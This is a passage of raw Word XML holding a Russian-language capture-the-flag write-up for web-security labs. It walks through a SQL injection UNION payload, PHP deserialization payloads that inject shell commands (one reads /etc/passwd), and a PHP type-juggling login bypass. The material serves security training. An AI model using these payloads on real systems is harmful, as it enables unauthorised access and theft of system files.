          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rprvqq1s5t86" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  /var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab shows how to easy gain access to the database. If attacker found this vulnerability he may read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file presented on the DBMS file system and in some cases issue commands to the operating system..</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">У нас нету никакого доступа к базе. Но есть инъекция с прошлого задания. Станем админом :)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3314700" cy="3409950"/>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3147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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Опять будем использовать бёрпсьюит. Пакет в репитер и начинаем тестить. Подбор количества полей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4648200" cy="333375"/>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482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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В итоге 3 поля будет после перебора ответ success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login=admin1" UNION SELECT 1,2,3--&amp;password=yRhB5MYn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Подставляем неверный айди, в ответе получим:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{"login":2}. Определили что нам нужен второй столбец на печать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4657725" cy="5334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577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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Меняем id пока не найдем нужный нам (смотрим на ответ от сервера). В данном случае айди нулевой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3752850" cy="2028825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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7528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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Вот и он :)</w:t>
      </w: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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wttcz4vsm3qa" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deserialization: C   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka use the D-grade inject’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ev18kdaowenw" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  /var/www/html/flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP допускает сериализацию объектов передаем специальные строки вида</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_klgg3afj7iz4" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "O:7:"MyClass":1:{s:7:"onclose";s:22:"123; cat /etc/passwd #";}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Где O - object. 7 - количество символов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Интереснее разобрать часть кода с s:22:”123; cat /etc/passwd #”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Что там происходит? Для этого есть исходник (скрин ниже). Мы видим s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="dd0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'echo ' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$this</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0000bb"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onclose </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="dd0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' &gt; /tmp/test'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007700"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Echo выполняет 123. Далее выводятся список паролей, но весь поток перенаправлен в /tmp/test. Поэтому мы комментим всё что справа от cat и на выходе получает список паролей и эхо как бонус :)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример из пдф - работает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1719263"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Комбинация из unserialize &amp; destruct в действии (первая заносит код в стуктуру, вторая их выполняет).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Видоизменяем нашу строку для вывода флага:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_he5xuyt9noe" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| O:7:"MyClass":1:{s:7:"onclose";s:29:"123; cat /var/www/html/flag #";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="15"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Флаг выводится скромно вверху страницы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="15"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="736600"/>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73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color w:val="b7b7b7"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xmz83fiek5" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Type Juggling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="b7b7b7"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aka 0’s is fun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jz63clnz42qn" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Location:  be admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="212529"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bla bla bla.. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Все решение в джагглинг таблице. Просто приводим пароль к, скажем - 0 (без двойных кавычек), или к TRUE. Честно не знаю что тут надо ещё расписать. Пруф, как всегда, ниже:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://fintech-vuln.l0r.ru/admin.php?login_data=[true,true</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
